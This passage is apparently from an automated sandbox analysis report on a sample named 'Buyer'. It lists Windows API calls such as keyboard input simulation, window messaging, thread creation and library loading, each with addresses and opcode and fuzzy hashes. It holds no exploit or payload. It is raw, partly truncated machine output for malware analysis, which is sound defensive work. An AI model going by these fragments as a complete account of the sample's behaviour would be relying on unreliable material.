                                                                                                    • Instruction Fuzzy Hash: 2D411D72900704AFD7249F38CC41B9ABBE9EF85710F20C52FF119DB681D775A902A781
                                                                                                    APIs
                                                                                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00FAB1AD
                                                                                                    • SetKeyboardState.USER32(00000080), ref: 00FAB1C9
                                                                                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00FAB237
                                                                                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00FAB289
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 432972143-0
                                                                                                    • Opcode ID: 151c70784f7e52fb8b07d689bcced051832eee443a495e71f1f8a92099e75c78
                                                                                                    • Instruction ID: 2e8f92265c4742e4092e55a9138e65071741f7a6db0d0518abf6cf042cce1542
                                                                                                    • Opcode Fuzzy Hash: 151c70784f7e52fb8b07d689bcced051832eee443a495e71f1f8a92099e75c78
                                                                                                    • Instruction Fuzzy Hash: BF3128B0E402486EFF228F64DC057FE7BE5AB57320F08425BE491961D2C7789945B791
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00FD5B12
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FD5B35
                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FD5B42
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00FD5B68
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3340791633-0
                                                                                                    • Opcode ID: 75a28d94edf5c3e9f8546c45a43f84dae185ad9eaea84696ca81f56e5df64fc3
                                                                                                    • Instruction ID: e56b856a94a9905025440be6f9fbdb6067255c2cd2886b85c497705a1a8fabdf
                                                                                                    • Opcode Fuzzy Hash: 75a28d94edf5c3e9f8546c45a43f84dae185ad9eaea84696ca81f56e5df64fc3
                                                                                                    • Instruction Fuzzy Hash: 1E318F35B5191CAFEB359A24CC85BE97B67AB44B60F1C4203FA11963E1C6399980BB81
                                                                                                    APIs
                                                                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00FAB2F2
                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00FAB30E
                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00FAB375
                                                                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00FAB3C7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 432972143-0
                                                                                                    • Opcode ID: 213e60a2761874f436fc698ea1f430183edd284994d35db27e6ca670bc042878
                                                                                                    • Instruction ID: 0dc3bb17ba88a785bcc9955b1f840488b1364e93602a0d5eb656cb17b5f44898
                                                                                                    • Opcode Fuzzy Hash: 213e60a2761874f436fc698ea1f430183edd284994d35db27e6ca670bc042878
                                                                                                    • Instruction Fuzzy Hash: 0531D4B0D40758EEFF208B658C157FE7BB6AB4A320F04421AE485961D2C3788995EB91
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F43914: _wcslen.LIBCMT ref: 00F43919
                                                                                                    • _wcslen.LIBCMT ref: 00FAE60C
                                                                                                    • _wcslen.LIBCMT ref: 00FAE623
                                                                                                    • _wcslen.LIBCMT ref: 00FAE64E
                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00FAE659
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$ExtentPoint32Text
                                                                                                    • String ID:
                                                                                                    • API String ID: 3763101759-0
                                                                                                    • Opcode ID: 167f446b9c041e22f98b550c39d78266dd6ef54bf97dcefa72d3d921f29305fa
                                                                                                    • Instruction ID: ff6af6cfae2c60abf9c02a206711bb473a7ef8261c92fef163f1bf5d16ea12b6
                                                                                                    • Opcode Fuzzy Hash: 167f446b9c041e22f98b550c39d78266dd6ef54bf97dcefa72d3d921f29305fa
                                                                                                    • Instruction Fuzzy Hash: 2121C9B1D00214AFCB10EFA8CD81BAEB7F8EF56760F144055E804FB345D6749E419BA1
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F59DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F59DE2
                                                                                                    • GetCursorPos.USER32(?), ref: 00FD96ED
                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F97D21,?,?,?,?,?), ref: 00FD9702
                                                                                                    • GetCursorPos.USER32(?), ref: 00FD974A
                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F97D21,?,?,?), ref: 00FD9780
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2864067406-0
                                                                                                    • Opcode ID: 484af23d4ba46572ee4cef08524c5e53806eab1f3f9db1df5766014ec14c3789
                                                                                                    • Instruction ID: b3c92281247d016258d1479075e44ffd3bc4e9139a3fa8a800355d2b9596d10a
                                                                                                    • Opcode Fuzzy Hash: 484af23d4ba46572ee4cef08524c5e53806eab1f3f9db1df5766014ec14c3789
                                                                                                    • Instruction Fuzzy Hash: 4821F135900108FFCF25AFA8C848EEA3BBBFB49360F184156FA0587261C3B59950FB50
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNEL32(?,00FDDB28), ref: 00FAD8E0
                                                                                                    • GetLastError.KERNEL32 ref: 00FAD8EF
                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00FAD8FE
                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00FDDB28), ref: 00FAD95B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 2267087916-0
                                                                                                    • Opcode ID: da074bcef2c7c2de8b1bcfc7140b903e1567901d83c43c9dc9aac1b503f920dd
                                                                                                    • Instruction ID: fa1e82d4565c906f4230ae8d937ed5236f0aaf90c7629745025e5d9438986b85
                                                                                                    • Opcode Fuzzy Hash: da074bcef2c7c2de8b1bcfc7140b903e1567901d83c43c9dc9aac1b503f920dd
                                                                                                    • Instruction Fuzzy Hash: 0121A6B19492059F8300DF24C88445F7BE8AE5B3A4F104A1AF4AAC72A1D730D946EB43
                                                                                                    APIs
                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00FD2FC8
                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FD2FE2
                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FD2FF0
                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00FD2FFE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                                    • String ID:
                                                                                                    • API String ID: 2169480361-0
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00FA2129
                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FA213B
                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FA2151
                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FA216C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F59DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F59DE2
                                                                                                    • GetClientRect.USER32(?,?), ref: 00FDA61D
                                                                                                    • GetCursorPos.USER32(?), ref: 00FDA627
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00FDA632
                                                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00FDA666
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 4127811313-0
                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00FAE83E
                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00FAE871
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00FAE887
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00FAE88E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 2880819207-0
                                                                                                    APIs
                                                                                                    • CreateThread.KERNEL32(00000000,?,00F6D349,00000000,00000004,00000000), ref: 00F6D568
                                                                                                    • GetLastError.KERNEL32 ref: 00F6D574
                                                                                                    • __dosmaperr.LIBCMT ref: 00F6D57B
                                                                                                    • ResumeThread.KERNEL32(00000000), ref: 00F6D599
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                    • String ID:
                                                                                                    • API String ID: 173952441-0
                                                                                                    APIs
                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F46709
                                                                                                    • GetStockObject.GDI32(00000011), ref: 00F4671D
                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F46727
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3970641297-0
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00F7336A,00000364,00000000,00000000,00000000,?,00F735DB,00000006,FlsSetValue), ref: 00F733F5
                                                                                                    • GetLastError.KERNEL32(?,00F7336A,00000364,00000000,00000000,00000000,?,00F735DB,00000006,FlsSetValue,00FE3268,FlsSetValue,00000000,00000364,?,00F73196), ref: 00F73401
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F7336A,00000364,00000000,00000000,00000000,?,00F735DB,00000006,FlsSetValue,00FE3268,FlsSetValue,00000000), ref: 00F7340F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3177248105-0
                                                                                                    APIs
                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00FA7B78
                                                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00FA7B90
                                                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00FA7BA5
                                                                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00FA7BC3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 1352324309-0
                                                                                                    APIs
                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00FAB3D4,?,00008000), ref: 00FAB7C5
                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00FAB3D4,?,00008000), ref: 00FAB7EA
                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00FAB3D4,?,00008000), ref: 00FAB7F4
                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00FAB3D4,?,00008000), ref: 00FAB827
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 2875609808-0
                                                                                                    • Opcode ID: ab1d34772d65bbf7d8c1ac0f7e737c810d0c2907fb6968c418ddfb4b66fa763e
                                                                                                    • Instruction ID: 10796f581e6fda7a81b09bf3be572ff9e09b5742bbf320c8bac7051ccae362a6
                                                                                                    • Opcode Fuzzy Hash: ab1d34772d65bbf7d8c1ac0f7e737c810d0c2907fb6968c418ddfb4b66fa763e
                                                                                                    • Instruction Fuzzy Hash: 90117CB1C0161DEBDF009FA8D9486EEBF79FF0A311F014086D841B2146CB345A51EB91
                                                                                                    APIs
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00FD851F
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00FD8537
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00FD855B
                                                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FD8576
                                                                                                    Similarity
                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 357397906-0
                                                                                                    • Opcode ID: 6ebf9254fc71a5789350a51530c460ba3ee4c59632db2a33c866b43cd8a4b863
                                                                                                    • Instruction ID: bf3b504ce35520e01ca7bd5b7f7527f601f8f74514cc972bc7fcae392ee4a3d3
                                                                                                    • Opcode Fuzzy Hash: 6ebf9254fc71a5789350a51530c460ba3ee4c59632db2a33c866b43cd8a4b863
                                                                                                    • Instruction Fuzzy Hash: 501140B9D0120DAFDB41CFA8D884AEEBBB5FB08310F108166E915E3610D735AA55DF90
                                                                                                    APIs
                                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00FA34A7
                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FA34B8
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00FA34BF
                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00FA34C6
                                                                                                    Similarity
                                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2710830443-0
                                                                                                    • Opcode ID: 0d22bb60b70b4d60878d27ead8b1832a8e95422f8ac99192f0dd384e43fb35fa
                                                                                                    • Instruction ID: c0d78ca4228e2809a17853a411193cc3d6a1499e95cf5fcd7104be7b66548bb9
                                                                                                    • Opcode Fuzzy Hash: 0d22bb60b70b4d60878d27ead8b1832a8e95422f8ac99192f0dd384e43fb35fa
                                                                                                    • Instruction Fuzzy Hash: 78E0657150222876D7215B729C0DEE77F5DDF46BA1F400056F505D108196A8C940E5B1
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F5986F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F598C9
                                                                                                      • Part of subcall function 00F5986F: SelectObject.GDI32(?,00000000), ref: 00F598D8
                                                                                                      • Part of subcall function 00F5986F: BeginPath.GDI32(?), ref: 00F598EF
                                                                                                      • Part of subcall function 00F5986F: SelectObject.GDI32(?,00000000), ref: 00F59918
                                                                                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00FD8F73
                                                                                                    • LineTo.GDI32(?,?,?), ref: 00FD8F80
                                                                                                    • EndPath.GDI32(?), ref: 00FD8F90
                                                                                                    • StrokePath.GDI32(?), ref: 00FD8F9E
                                                                                                    Similarity
                                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                    • String ID:
                                                                                                    • API String ID: 1539411459-0
                                                                                                    • Opcode ID: 698fee65412c20f2b5456fe35051ad606c87889bcb98482cf367d3c5ae7e2c4a
                                                                                                    • Instruction ID: fe227dc5024fbf220e93889b28ff6908d4d6df25d6731c74966a75640a3d311a
                                                                                                    • Opcode Fuzzy Hash: 698fee65412c20f2b5456fe35051ad606c87889bcb98482cf367d3c5ae7e2c4a
                                                                                                    • Instruction Fuzzy Hash: 02F05E3100665DBADB126F64AC0DFCE3F5BAF06361F188002FA11251E5C7BA9522ABA5
                                                                                                    APIs
                                                                                                    • GetSysColor.USER32(00000008), ref: 00F59AFC
                                                                                                    • SetTextColor.GDI32(?,?), ref: 00F59B06
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00F59B19
                                                                                                    • GetStockObject.GDI32(00000005), ref: 00F59B21
                                                                                                    Similarity
                                                                                                    • API ID: Color$ModeObjectStockText
                                                                                                    • String ID:
                                                                                                    • API String ID: 4037423528-0
                                                                                                    • Opcode ID: 394b744d14d17c34f57ce2e4178d894affdc2ad3eda5d46cc1d67002c0e9ebce
                                                                                                    • Instruction ID: 6d3db8b038a694fb5a0a1930ca6baf8ca5904c44664fcc1c14b16b78e7a1aa85
                                                                                                    • Opcode Fuzzy Hash: 394b744d14d17c34f57ce2e4178d894affdc2ad3eda5d46cc1d67002c0e9ebce
                                                                                                    • Instruction Fuzzy Hash: 83E06532645344AAEB215F74BC09BD83B12EB51336F08821AF6F5440E4C3714644AB11
                                                                                                    APIs
                                                                                                    • GetDesktopWindow.USER32 ref: 00F9EACE
                                                                                                    • GetDC.USER32(00000000), ref: 00F9EAD8
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F9EAF8
                                                                                                    • ReleaseDC.USER32(?), ref: 00F9EB19
                                                                                                    Similarity
                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2889604237-0
                                                                                                    • Opcode ID: d117fa84931900d30f9762ec6df0da8ba1c6d611af661f280bb61145b3463842
